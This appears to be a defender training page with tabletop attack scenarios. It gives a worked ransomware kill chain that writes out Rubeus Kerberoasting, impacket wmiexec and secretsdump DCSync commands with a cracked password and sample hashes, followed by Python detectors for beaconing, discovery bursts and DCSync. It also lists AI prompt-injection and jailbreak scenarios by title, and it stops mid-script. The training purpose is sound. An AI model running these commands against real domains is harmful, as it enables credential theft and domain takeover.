# Attack Scenario Library
Scenario-Based Learning
Tabletop exercises and purple team scenarios are the highest-fidelity learning activity in security operations training. Reading about an attack is passive; being the analyst when it unfolds builds the muscle memory, communication habits, and decision frameworks that make defenders effective under pressure.
Each scenario in this library is a self-contained exercise packet: threat actor backstory, phased attack narrative with realistic evidence, discussion inject questions, expected analyst actions, detection gaps, and a structured debrief guide.
## How to Use This Library
Work through each scenario phase independently. At each Discussion Inject, pause and write down your answers before reading the expected analyst actions. Compare your response to the guidance — gaps reveal knowledge or tooling blind spots worth investigating.
Assign roles before starting: Incident Commander, Lead Analyst, Threat Intel, Communications Lead, and Legal/Compliance Observer. The facilitator reads each phase aloud and presents the inject questions. The team deliberates; the facilitator captures decisions and challenges assumptions where warranted. Run the debrief guide at the end.
Red team executes the attack narrative against the real environment (or a lab clone). Blue team defends without advance knowledge of the scenario. After each phase, pause for a structured sync: did detection fire? Was the evidence interpretable? What would have changed the outcome?
## Difficulty Rating System
Each scenario carries a 1–5 star difficulty rating based on four axes:
| Stars | Detection Complexity | Attack Sophistication | Response Complexity | Who It Is For |
|---|---|---|---|---|
| ★☆☆☆☆ | Noisy, obvious IOCs | Script-kiddie level | Straightforward playbook | SOC Tier 1 new hires |
| ★★☆☆☆ | Moderate; SIEM alerts present | Criminal, opportunistic | Multi-team coordination | Tier 1–2 analysts |
| ★★★☆☆ | Some evasion; mixed signals | Skilled criminal group | Judgment calls required | Tier 2 + detection engineers |
| ★★★★☆ | Significant evasion; partial evidence | Sophisticated eCrime / APT-light | Cross-domain decisions | Senior analysts, architects |
| ★★★★★ | Stealth-first; may never alert | Nation-state APT | Strategic and legal dimensions | Senior IR, CISO, legal |
## Tabletop Facilitation Guide
### Before the Exercise
- [ ] Select scenario appropriate to team experience level (use rating above)
- [ ] Assign roles: Incident Commander, Lead Analyst, Threat Intel Analyst, Comms Lead, Legal/Risk Observer
- [ ] Brief participants: "This is a no-fault learning environment. All decisions are valid starting points for discussion."
- [ ] Confirm logistics: whiteboard or shared doc for timeline, action log, and decision capture
- [ ] Set time boundaries per phase (suggested times shown in each scenario header)
- [ ] Designate a scribe to capture decisions and action items
### During the Exercise
- The facilitator reads each Phase narrative aloud, then presents evidence artifacts
- At each `???+ inject` block, pause — allow 5–10 minutes of team discussion before moving on
- The facilitator's job is not to correct the team but to ask probing questions:
  - "What tool would you use to verify that?"
  - "Who else needs to know about this decision right now?"
  - "What's your confidence level, and what would change it?"
- Capture all decisions in the action log — revisit them in debrief
### Inject Question Philosophy
Discussion injects are marked with `???+ inject "Phase N — Inject"` admonition blocks. They are categorized by type:
| Inject Type | Purpose |
|---|---|
| Technical | Analyst tool and technique knowledge |
| Decision | Judgment calls under uncertainty |
| Communication | Stakeholder and escalation decisions |
| Legal/Compliance | Regulatory, notification, or legal obligations |
## Post-Exercise Debrief Guide
Run immediately after the exercise (within 30 minutes, while context is fresh).
### Hot Debrief (15 minutes — all participants)
- What went well? — name two things the team did effectively
- Where did we hesitate? — identify the moments of uncertainty and why
- What surprised us? — evidence or attacker behavior that was unexpected
- What single control, if in place, would have changed the outcome most?
### Deep Debrief (45–60 minutes — leads only)
- Walk the kill chain against your actual control coverage — where are the real gaps?
- Review each decision point: was the right person in the room? Did they have the right data?
- Map detected vs. missed attacker actions to your SIEM use case library
- Identify 3 concrete action items with owners and due dates — add to the risk register
- Schedule a follow-up exercise in 90 days to test whether gaps were closed
## Scenario Index
### Quick Reference Grid
| ID | Scenario | Type | Difficulty | Duration | Threat Actor |
|---|---|---|---|---|---|
| SC-001 | Enterprise Ransomware — Full Kill Chain | Ransomware | ★★★★☆ | 4h | RaaS Affiliate |
| SC-002 | APT Espionage Campaign | APT | ★★★★★ | 3h+ | Nation-State |
| SC-003 | Insider Data Theft — Departing Employee | Insider | ★★★☆☆ | 2h | Malicious Insider |
| SC-004 | Software Supply Chain Attack | Supply Chain | ★★★★★ | 4h | Nation-State |
| SC-005 | Business Email Compromise — Wire Fraud | BEC/Fraud | ★★★☆☆ | 2h | eCrime Group |
| SC-006 | Cloud Misconfiguration to Data Breach | Cloud | ★★☆☆☆ | 2h | Opportunistic |
| SC-007 | Healthcare Ransomware — Patient Safety | Ransomware/OT | ★★★★☆ | 3h | RaaS Affiliate |
| SC-008 | OT/ICS Sabotage — Power Grid | OT/ICS | ★★★★★ | 4–6h | Nation-State |
| SC-009 | Cloud Account Takeover → Data Exfiltration | Cloud | ★★★★☆ | 2–3h | eCrime Group |
| SC-010 | Nation-State APT — Long-Term Espionage | APT | ★★★★★ | 4–6h | Nation-State |
| SC-011 | OT/ICS Ransomware — Manufacturing | OT/ICS | ★★★★☆ | 3–4h | RaaS Affiliate |
| SC-012 | AI System Security — LLM Prompt Injection | AI Security | ★★★☆☆ | 2h | eCrime / Insider |
| SC-013 | AI Model Poisoning | AI Security | ★★★★☆ | 2–3h | Nation-State |
| SC-014 | OT Ransomware — Energy Sector | OT/ICS | ★★★★☆ | 3–4h | RaaS Affiliate |
| SC-015 | Business Email Compromise Deep Dive | BEC/Fraud | ★★★☆☆ | 2h | eCrime Group |
| SC-016 | Kubernetes Compromise | Cloud | ★★★★★ | 3–4h | eCrime Group |
| SC-017 | Insider Threat Data Exfiltration | Insider | ★★★★☆ | 2–3h | Malicious Insider |
| SC-018 | Mobile Device Compromise | Mobile | ★★★☆☆ | 2h | eCrime Group |
| SC-019 | Deepfake Social Engineering | Social Engineering | ★★★★☆ | 2–3h | eCrime Group |
| SC-020 | Critical Infrastructure — Energy | OT/ICS | ★★★★★ | 4–6h | Nation-State |
| SC-021 | AI Model Supply Chain Attack | AI/ML Supply Chain | ★★★★★ | 3–4h | Nation-State |
| SC-022 | Enterprise LLM Jailbreak & Data Exfil | AI/ML Exploitation | ★★★★☆ | 2–3h | eCrime Group |
| SC-023 | RAG Poisoning & Knowledge Base Compromise | AI/ML Data Integrity | ★★★★★ | 3–4h | Insider Threat |
| SC-024 | Deepfake Authentication Bypass | AI-Enabled Identity | ★★★★★ | 3–4h | eCrime Group |
| SC-025 | Software Supply Chain Compromise | Supply Chain | ★★★★★ | 3–4h | Nation-State |
| SC-026 | Zero-Day Exploitation Campaign | Vulnerability Exploitation | ★★★★★ | 4–6h | Nation-State |
| SC-027 | Cloud Cryptomining Infrastructure Abuse | Cloud / Impact | ★★★★☆ | 2–3h | eCrime Group |
| SC-028 | API Abuse Leading to Mass Data Exfiltration | Application Security | ★★★★☆ | 2–3h | eCrime Group |
| SC-029 | Firmware Backdoor: Operation Silicon Ghost | IoT/OT / Supply Chain | ★★★★★ | 4–6h | Nation-State |
| SC-030 | DNS Hijacking: Operation Name Storm | Network / Credential Access | ★★★★★ | 3–4h | eCrime Syndicate |
| SC-031 | OAuth Token Abuse: Operation Consent Trap | Identity / Cloud | ★★★★☆ | 2–3h | Espionage Group |
| SC-032 | Wireless Attack: Operation Air Bridge | Network / Physical | ★★★★☆ | 2–3h | Red Team |
### Scenario Cards
- SC-001 · Enterprise Ransomware — Full Kill Chain
  Type: Ransomware | Difficulty: ★★★★☆
  Duration: 4 hours compressed | Participants: 4–8
  Actors: RaaS affiliate (LockBit 3.0-style) — financially motivated
  TTPs: HTML smuggling · Cobalt Strike · BloodHound/SharpHound · Kerberoasting · DCSync · Double extortion
- SC-002 · APT Espionage Campaign
  Type: APT | Difficulty: ★★★★★
  Duration: 3 hours+ | Participants: 5–8
  Actors: Nation-state (APT29-style, Russian SVR) — espionage
  TTPs: Malicious macro · WellMess C2 · OneDrive exfil · Pass-the-Ticket · Long dwell time
- SC-003 · Insider Data Theft
  Type: Insider | Difficulty: ★★★☆☆
  Duration: 2 hours | Participants: 3–6
  Actors: Departing senior data scientist — financially motivated
  TTPs: Abnormal file access (UEBA) · DLP bypass · USB exfil · Residual SaaS access
- SC-004 · Software Supply Chain Attack
  Type: Supply Chain | Difficulty: ★★★★★
  Duration: 4 hours | Participants: 5–10
  Actors: Nation-state — SolarWinds methodology
  TTPs: CI/CD implant · Trojanized update · Stage 2 selective targeting · Living-off-the-land
- SC-005 · Business Email Compromise
  Type: BEC/Fraud | Difficulty: ★★★☆☆
  Duration: 2 hours | Participants: 3–6
  Actors: West African eCrime group — wire fraud
  TTPs: AiTM phishing · Session cookie theft · CEO impersonation · DMARC abuse · $1.8M wire fraud
- SC-006 · Cloud Misconfiguration Breach
  Type: Cloud | Difficulty: ★★☆☆☆
  Duration: 2 hours | Participants: 3–5
  Actors: Opportunistic criminal — automated scanning
  TTPs: Public S3 bucket · No access logging · 450K PII records · GDPR 72h notification clock
- SC-007 · Healthcare Ransomware
  Type: Ransomware · Healthcare | Difficulty: ★★★★☆
  Duration: 3 hours | Participants: 5–10
  Actors: ALPHV/BlackCat affiliate — double extortion
  TTPs: IAB-purchased RDP · ADCS ESC1 · Epic EHR encrypted · Patient safety incidents · HIPAA breach
- SC-008 · OT/ICS Sabotage — Power Grid
  Type: OT/ICS | Difficulty: ★★★★★
  Duration: 4–6 hours | Participants: 6–12
  Actors: Nation-state (Sandworm/ELECTRUM-style)
  TTPs: CRASHOVERRIDE methodology · IEC 61850/104 modules · SIS DoS · NERC CIP violations · 230K customers impacted
- SC-009 · Cloud Account Takeover → Data Exfiltration
  Type: Cloud | Difficulty: ★★★★☆
  Duration: 2–3 hours | Participants: 4–8
  Actors: eCrime group (financially motivated)
  TTPs: O365 credential phishing · OAuth token theft · Mail forwarding · BEC invoice fraud · AWS SSRF · S3 mass download (100 GB)
- SC-010 · Nation-State APT — Long-Term Espionage
  Type: APT | Difficulty: ★★★★★
  Duration: 4–6 hours or multi-session | Participants: 5–10
  Actors: APT-X (fictional, East Asia origin) — defense contractor targeting
  TTPs: Zero-day PDF · Custom implant · LOTL AD enumeration · Slow-drip exfil (100 MB/week) · 6-month dwell time
- SC-011 · OT/ICS Ransomware — Manufacturing
  Type: OT/ICS | Difficulty: ★★★★☆
  Duration: 3–4 hours | Participants: 5–10
  Actors: RaaS affiliate — opportunistic + OT-aware
  TTPs: Phishing → Cobalt Strike · IT-to-OT pivot · SCADA historian access · HMI encryption · Safety shutdown decision · ICS-CERT notification
- SC-012 · AI System Security — LLM Prompt Injection
  Type: AI Security | Difficulty: ★★★☆☆
  Duration: 2 hours | Participants: 3–8
  Actors: eCrime group / insider threat
  TTPs: Indirect prompt injection · SOAR manipulation · Knowledge base poisoning · Alert suppression · AI audit trail gaps
- SC-013 · AI Model Poisoning
  Type: AI Security | Difficulty: ★★★★☆
  Duration: 2–3 hours | Participants: 4–8
  Actors: Nation-state — AI supply chain targeting
  TTPs: Training data poisoning · Model backdoor · Adversarial ML · Drift detection evasion
- SC-014 · OT Ransomware — Energy Sector
  Type: OT/ICS | Difficulty: ★★★★☆
  Duration: 3–4 hours | Participants: 4–8
  Actors: RaaS affiliate — OT-aware variant
  TTPs: IT-OT pivot · SCADA targeting · Safety system impact · Energy sector disruption
- SC-015 · Business Email Compromise Deep Dive
  Type: BEC/Fraud | Difficulty: ★★★☆☆
  Duration: 2 hours | Participants: 3–6
  Actors: eCrime group — financially motivated
  TTPs: AiTM phishing · Token theft · Wire fraud · Business process manipulation
- SC-016 · Kubernetes Compromise
  Type: Cloud | Difficulty: ★★★★★
  Duration: 3–4 hours | Participants: 4–8
  Actors: eCrime group — container exploitation specialist
  TTPs: Container escape · RBAC abuse · Secrets theft · Lateral movement · Cryptomining
- SC-017 · Insider Threat Data Exfiltration
  Type: Insider | Difficulty: ★★★★☆
  Duration: 2–3 hours | Participants: 4–6
  Actors: Malicious insider — departing employee
  TTPs: Privileged access abuse · Data staging · Cloud exfil · DLP evasion
- SC-018 · Mobile Device Compromise
  Type: Mobile | Difficulty: ★★★☆☆
  Duration: 2 hours | Participants: 3–6
  Actors: eCrime group — mobile exploitation
  TTPs: Malicious app · MDM bypass · Credential harvesting · SMS interception
- SC-019 · Deepfake Social Engineering
  Type: Social Engineering | Difficulty: ★★★★☆
  Duration: 2–3 hours | Participants: 4–8
  Actors: eCrime group — deepfake specialist
  TTPs: Voice deepfake · Video manipulation · Executive impersonation · Wire fraud
- SC-020 · Critical Infrastructure — Energy
  Type: OT/ICS | Difficulty: ★★★★★
  Duration: 4–6 hours | Participants: 5–10
  Actors: Nation-state — critical infrastructure targeting
  TTPs: Supply chain compromise · SCADA exploitation · Safety system targeting · Grid disruption
- SC-021 · AI Model Supply Chain Attack
  Type: AI/ML Supply Chain | Difficulty: ★★★★★
  Duration: 3–4 hours | Participants: 4–8
  Actors: Nation-state — AI supply chain specialist
  TTPs: Backdoored model · Poisoned weights · ML pipeline compromise · Model registry tampering
- SC-022 · Enterprise LLM Jailbreak
  Type: AI/ML Exploitation | Difficulty: ★★★★☆
  Duration: 2–3 hours | Participants: 4–8
  Actors: eCrime group — LLM exploitation specialist
  TTPs: Prompt injection · Jailbreaking · Data exfil via inference API · System prompt leaking
- SC-023 · RAG Poisoning Attack
  Type: AI/ML Data Integrity | Difficulty: ★★★★★
  Duration: 3–4 hours | Participants: 4–8
  Actors: Insider threat — knowledge base write access
  TTPs: Vector DB poisoning · Document injection · Retrieval hijacking · Embedding manipulation
- SC-024 · Deepfake Authentication Bypass
  Type: AI-Enabled Identity | Difficulty: ★★★★★
  Duration: 3–4 hours | Participants: 4–8
  Actors: eCrime group — synthetic identity specialist
  TTPs: Face deepfake · Voice cloning · Biometric bypass · KYC fraud · Liveness detection evasion
- SC-025 · Software Supply Chain Compromise
  Type: Supply Chain | Difficulty: ★★★★★
  Duration: 3–4 hours | Participants: 4–8
  Actors: PHANTOM FORGE — nation-state supply chain operators
  TTPs: CI/CD poisoning · Dependency confusion · Code signing bypass · Backdoored artifacts
- SC-026 · Zero-Day Exploitation Campaign
  Type: Vulnerability Exploitation | Difficulty: ★★★★★
  Duration: 4–6 hours | Participants: 4–8
  Actors: IRON LOTUS — nation-state APT targeting defense sector
  TTPs: Edge appliance zero-day · Lateral movement · Data staging · Behavioral detection evasion
- SC-027 · Cloud Cryptomining Infrastructure Abuse
  Type: Cloud / Impact | Difficulty: ★★★★☆
  Duration: 2–3 hours | Participants: 3–6
  Actors: COIN SHADOW — financially motivated cloud abuse group
  TTPs: Credential theft · Mass GPU provisioning · Cryptomining · Billing anomaly evasion
- SC-028 · API Abuse Leading to Mass Data Exfiltration
  Type: Application Security | Difficulty: ★★★★☆
  Duration: 2–3 hours | Participants: 3–6
  Actors: DATA WRAITH — data broker with automated scraping tools
  TTPs: BOLA exploitation · API scraping · GraphQL introspection · Rate limit bypass
- SC-029 · Firmware Backdoor: Operation Silicon Ghost
  Type: IoT/OT Supply Chain | Difficulty: ★★★★★
  Duration: 4–6 hours | Participants: 4–8
  Actors: CIRCUIT PHANTOM — nation-state targeting industrial control systems
  TTPs: Firmware reverse engineering · Backdoor implant · DNS-over-HTTPS C2 · Industrial sabotage
- SC-030 · DNS Hijacking: Operation Name Storm
  Type: Network | Difficulty: ★★★★★
  Duration: 3–4 hours | Participants: 3–6
  Actors: SHADOW RESOLVER — cybercrime syndicate targeting financial services
  TTPs: Registrar compromise · DNS record manipulation · Certificate fraud · MitM
- SC-031 · OAuth Token Abuse: Operation Consent Trap
  Type: Identity/Cloud | Difficulty: ★★★★☆
  Duration: 2–3 hours | Participants: 3–6
  Actors: VELVET HOOK — espionage group targeting professional services
  TTPs: OAuth consent phishing · Token harvesting · Mailbox access · Refresh token persistence
- SC-032 · Wireless Attack: Operation Air Bridge
  Type: Network/Physical | Difficulty: ★★★★☆
  Duration: 2–3 hours | Participants: 3–6
  Actors: RADIO FALCON — red team simulation / insider threat
  TTPs: Evil twin AP · RADIUS credential capture · WPA2-Enterprise abuse · Lateral movement
## SC-001: Enterprise Ransomware — Full Kill Chain
- Duration: Multi-week exercise (or 4-hour compressed tabletop)
- Threat Actor Profile: LockBit 3.0-style RaaS affiliate
- Initial Access: Phishing email with ISO attachment (HTML smuggling)
- Objective: Full domain encryption + double extortion
### Phase 1: Initial Access
DAY 0:
─────────────────────────────────────────────────────────
Attacker sends spearphishing email to finance department:
From: payroll-notifications@payr0ll-service.com (lookalike domain)
To: accounts.payable@targetcorp.com
Subject: ACTION REQUIRED: ADP Payroll Update - Direct Deposit Changes
"Dear Team,
ADP has updated our security policy requiring re-enrollment for direct
deposit. Please review and confirm your banking information by Friday.
[Open Secure Document]"
→ HTML attachment uses HTML smuggling to drop ISO file
→ ISO contains LNK shortcut + DLL
→ LNK executes: cmd /c start /b rundll32.exe update.dll,Install
→ DLL loads Cobalt Strike beacon
→ Beacon: HTTPS to compromised CDN (domain fronting via Cloudflare)
→ 45-second sleep + 15% jitter
ATT&CK Techniques:
- T1566.001: Spearphishing Attachment
- T1027.006: HTML Smuggling
- T1218.011: Rundll32
- T1071.001: Web Protocols (HTTPS C2)
Detection Opportunities:
- Email gateway: HTML attachment + ISO URL pattern
- EDR: rundll32.exe spawning from ISO-mounted directory
- DNS: Domain age check on lookalike domain (0–30 days)
- Network: HTTPS connection to domain-fronted CDN from unusual process
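The beacon's 45-second sleep with 15% jitter is itself a detectable property: its connections to the CDN arrive every 38 to 52 seconds, so the spread of inter-arrival times is small relative to their mean, while a browser or updater talking to the same kind of CDN shows no such rhythm. The Python below is an added example for this page, not part of the scenario packet; it groups outbound connections by host, process and destination and flags series whose timing is that regular. The log lines, hostnames and destination names are constructed, and the thresholds (at least six connections, coefficient of variation at most 0.25) are assumptions to tune against your own proxy or firewall data.

```python
"""Beacon-interval detection over outbound connection logs.

Added example for this page, not part of the scenario packet. A beacon
configured with a 45 s sleep and 15% jitter connects every 38-52 s, so the
spread of its inter-arrival times is small relative to the mean; a browser
or updater talking to the same kind of CDN does not show that regularity.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample (not real traffic): "<timestamp> <host> <process> <destination>".
# The rundll32.exe series follows the page's 45 s sleep with 15% jitter.
SAMPLE_LOG = """\
2026-03-01T09:00:00 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:00:47 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:01:28 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:02:18 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:03:02 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:03:41 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:04:29 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:05:14 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:05:57 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:06:48 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:07:30 FIN-WS-07 rundll32.exe cdn-assets.example-cdn.net:443
2026-03-01T09:00:05 FIN-WS-07 chrome.exe news.example.org:443
2026-03-01T09:00:09 FIN-WS-07 chrome.exe news.example.org:443
2026-03-01T09:02:30 FIN-WS-07 chrome.exe news.example.org:443
2026-03-01T09:02:31 FIN-WS-07 chrome.exe news.example.org:443
2026-03-01T09:10:00 FIN-WS-07 chrome.exe news.example.org:443
2026-03-01T09:10:40 FIN-WS-07 chrome.exe news.example.org:443
2026-03-01T09:25:12 FIN-WS-07 chrome.exe news.example.org:443
2026-03-01T09:01:00 FIN-WS-07 explorer.exe sso.example-corp.internal:443
2026-03-01T09:31:00 FIN-WS-07 explorer.exe sso.example-corp.internal:443
"""

MIN_EVENTS = 6   # assumption: fewer connections than this cannot establish a rhythm
MAX_CV = 0.25    # assumption: coefficient of variation at or below this looks machine-timed


def parse_log(text):
    """Group connection timestamps by (host, process, destination)."""
    series = defaultdict(list)
    for line in text.strip().splitlines():
        ts, host, proc, dest = line.split()
        series[(host, proc, dest)].append(datetime.fromisoformat(ts))
    return series


def interval_stats(times):
    """Mean inter-arrival time in seconds and its coefficient of variation (stdev / mean)."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    avg = mean(gaps)
    return avg, (pstdev(gaps) / avg if avg else float("inf"))


def find_beacons(text, min_events=MIN_EVENTS, max_cv=MAX_CV):
    """Return the series whose timing is regular enough to look like a beacon."""
    hits = []
    for (host, proc, dest), times in parse_log(text).items():
        if len(times) < min_events:
            continue
        avg, cv = interval_stats(times)
        if cv <= max_cv:
            hits.append({"host": host, "process": proc, "dest": dest,
                         "mean_interval_s": round(avg, 1), "cv": round(cv, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(f"beacon-like: {hit['process']} on {hit['host']} -> {hit['dest']} "
              f"every ~{hit['mean_interval_s']}s (cv={hit['cv']})")
```

On the constructed sample only the rundll32.exe series is reported (mean interval 45.0 s, cv 0.083); the browser series has a cv above 1 and the two-event series never reaches the minimum. Longer sleeps with the same jitter give the same cv, so the threshold does not need re-tuning per sleep setting, but a beacon that randomises its sleep far more than 15% will slip under this single test and needs the volume and destination-reputation checks alongside it.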
### Phase 2: Foothold and Discovery (Days 1-3)
DAY 1-3:
─────────────────────────────────────────────────────────
Beacon active on finance workstation:
→ whoami /all (T1033)
→ net user /domain (T1087.002)
→ systeminfo (T1082)
→ ipconfig /all (T1016)
→ net view /all (T1135)
Deploy SharpHound data collector:
→ Upload via Cobalt Strike: upload SharpHound.exe C:\Windows\Temp\svchost32.exe
→ Execute: execute-assembly SharpHound.exe -c All --ZipFileName data.zip
→ Download results to analyst
BloodHound analysis reveals:
→ Finance workstation user is member of Finance_Managers group
→ Finance_Managers has WriteDacl on HR_System$ share
→ HR_System$ server is domain joined
→ Domain backup operator account has logon rights to backup server
→ Backup server can DCSync (misconfigured)
Attacker selects path: Finance → Kerberoast service account → pivot to backup server → DCSync
ATT&CK Techniques:
- T1069.002: Domain Groups
- T1087.002: Domain Account enumeration
- T1482: Domain Trust Discovery
Detection Opportunities:
- SIEM: Multiple AD enumeration commands in rapid succession
- EDR: SharpHound binary execution (hash or behavior signature)
- AD: LDAP queries with unusual filters (BloodHound pattern)
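The "rapid succession" SIEM opportunity is worth making concrete, because each of the five commands the beacon ran is routine on its own and only the cluster is the signal. The Python below is an added example, not part of the scenario packet: it keeps process-creation records that match the discovery commands listed in Phase 2, groups them per host, and alerts when at least four distinct techniques appear inside a five-minute window. Hostnames, users and timestamps are constructed, and the window and threshold are assumptions.

```python
"""Discovery-command burst detection for the Phase 2 "rapid succession" signal.

Added example, not from the scenario packet. Any single command below is
routine admin activity; the alert condition is several distinct discovery
techniques from one host inside a short window. Hostnames, users and
timestamps are constructed; the window and threshold are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records: "<timestamp>|<host>|<user>|<command line>"
SAMPLE_EVENTS = """\
2026-03-01T09:12:03|FIN-WS-07|jdoe|whoami /all
2026-03-01T09:12:41|FIN-WS-07|jdoe|net user /domain
2026-03-01T09:13:10|FIN-WS-07|jdoe|systeminfo
2026-03-01T09:13:55|FIN-WS-07|jdoe|ipconfig /all
2026-03-01T09:14:30|FIN-WS-07|jdoe|net view /all
2026-03-01T09:15:02|FIN-WS-07|jdoe|outlook.exe
2026-03-01T10:05:00|IT-ADMIN-01|helpdesk|ipconfig /all
2026-03-01T14:20:00|IT-ADMIN-01|helpdesk|systeminfo
"""

# Command-line prefixes the scenario lists, keyed to the ATT&CK ids it gives them
DISCOVERY_COMMANDS = {
    "whoami": "T1033",
    "net user": "T1087.002",
    "systeminfo": "T1082",
    "ipconfig": "T1016",
    "net view": "T1135",
}
WINDOW = timedelta(minutes=5)   # assumption
MIN_DISTINCT = 4                # assumption: distinct techniques needed to alert


def classify(cmdline):
    """Map a command line to a discovery technique id, or None if it is not one."""
    cl = cmdline.strip().lower()
    for prefix, technique in DISCOVERY_COMMANDS.items():
        if cl.startswith(prefix):
            return technique
    return None


def parse_events(text):
    """Keep only discovery commands, grouped by host and sorted by time."""
    per_host = defaultdict(list)
    for line in text.strip().splitlines():
        ts, host, user, cmd = line.split("|", 3)
        technique = classify(cmd)
        if technique:
            per_host[host].append((datetime.fromisoformat(ts), user, technique))
    for events in per_host.values():
        events.sort()
    return per_host


def find_bursts(text, window=WINDOW, min_distinct=MIN_DISTINCT):
    """One alert per host whose discovery commands cover >= min_distinct techniques within window."""
    alerts = []
    for host, events in parse_events(text).items():
        for i, (start, user, _) in enumerate(events):
            in_window = [e for e in events[i:] if e[0] - start <= window]
            techniques = sorted({e[2] for e in in_window})
            if len(techniques) >= min_distinct:
                alerts.append({"host": host, "user": user, "start": start.isoformat(),
                               "techniques": techniques})
                break   # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in find_bursts(SAMPLE_EVENTS):
        print(f"discovery burst on {alert['host']} by {alert['user']} "
              f"from {alert['start']}: {', '.join(alert['techniques'])}")
```

The helpdesk host runs two of the same commands hours apart and is not reported; counting distinct techniques rather than raw command count is what keeps a single repeated `ipconfig` from paging anyone. The same structure extends to the SharpHound signal in the next bullet by adding its LDAP query volume as another technique key.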
### Phase 3: Privilege Escalation (Days 4-5)
DAY 4-5:
─────────────────────────────────────────────────────────
Kerberoasting against SVC_Backup account (SPN: backup/backupserver.corp.local):
→ Rubeus kerberoast /format:hashcat → SVC_Backup TGS hash extracted
→ Hashcat cracking: rules attack on rockyou.txt + company wordlist
→ Password cracked: "Backup2022!" (in 4 hours with GPU cluster)
Lateral movement to backup server:
→ Impacket wmiexec.py CORP/SVC_Backup:Backup2022!@10.0.1.45
→ Shell on backup server
→ Enumerate: Does SVC_Backup have DS-Replication rights?
→ BloodHound confirms: YES
DCSync attack:
→ impacket secretsdump.py CORP/SVC_Backup:Backup2022!@10.0.1.10 -just-dc-ntlm
→ All domain account hashes extracted including krbtgt
→ Administrator: aad3b435b51404eeaad3b435b51404ee:32196B56FFE6F45E294117B4D972F8B2
→ krbtgt: aad3b435b51404eeaad3b435b51404ee:e6d31a1d9e3c4d1b5f8e72f4a2c6e8b9
Detection Opportunities:
- SIEM: Event 4769 RC4 TGS for SVC_Backup account
- AD: DS-Replication request from non-DC IP
- Network: Impacket tool signatures in SMB traffic
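The first two detection opportunities map to specific Windows security events: Kerberoasting appears as Event 4769 with an RC4 (0x17) ticket requested for an account-backed SPN, and DCSync as Event 4662 exercising the DS-Replication-Get-Changes extended rights. The Python below is an added example, not part of the scenario packet; the events are constructed dicts shaped like parsed security-log records, and the list of known domain controller accounts is an assumption. Event 4662 carries the calling account but not a source IP, so the DCSync rule keys on the account rather than the "non-DC IP" the table names; the IP comes from correlating with network telemetry.

```python
"""Kerberoasting and DCSync detection over Windows security events.

Added example, not part of the scenario packet. Works on events already
parsed into dicts (as a SIEM or log shipper would deliver them); the
sample events below are constructed.
"""
from collections import defaultdict

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4; AES tickets are 0x11 / 0x12
# Extended-rights GUIDs a DCSync caller must hold (from the AD schema)
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
KNOWN_DC_ACCOUNTS = {"DC01$"}   # assumption: your DC machine accounts go here

# Constructed events (not real log data)
SAMPLE_EVENTS = [
    # 4769: two RC4 tickets for user-backed SPNs from one workstation, then normal AES tickets
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "SVC_Backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.2.33"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "SVC_SQL",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.2.33"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "FIN-WS-07$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.2.33"},
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.2.51"},
    # 4662: replication rights exercised by a service account, then legitimately by a DC
    {"EventID": 4662, "SubjectUserName": "SVC_Backup", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "ObjectType": "domainDNS",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "user",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},  # placeholder GUID, unrelated right
]


def kerberoast_hits(events):
    """4769 with an RC4 ticket for an SPN backed by a user account (not a machine account, not krbtgt)."""
    hits = []
    for e in events:
        if e.get("EventID") != 4769 or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits.append((e["IpAddress"], e["TargetUserName"], svc))
    return hits


def roasting_sweeps(events, min_services=2):
    """Requesters that pulled RC4 tickets for several different service accounts."""
    by_requester = defaultdict(set)
    for ip, user, svc in kerberoast_hits(events):
        by_requester[(ip, user)].add(svc)
    return {k: sorted(v) for k, v in by_requester.items() if len(v) >= min_services}


def dcsync_hits(events, dc_accounts=KNOWN_DC_ACCOUNTS):
    """4662 exercising replication rights by anything other than a known DC machine account."""
    hits = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        guids = {g.strip("{}").lower() for g in e.get("Properties", "").split()}
        matched = guids & DS_REPLICATION_GUIDS
        if matched and e["SubjectUserName"] not in dc_accounts:
            hits.append((e["SubjectUserName"], sorted(matched)))
    return hits


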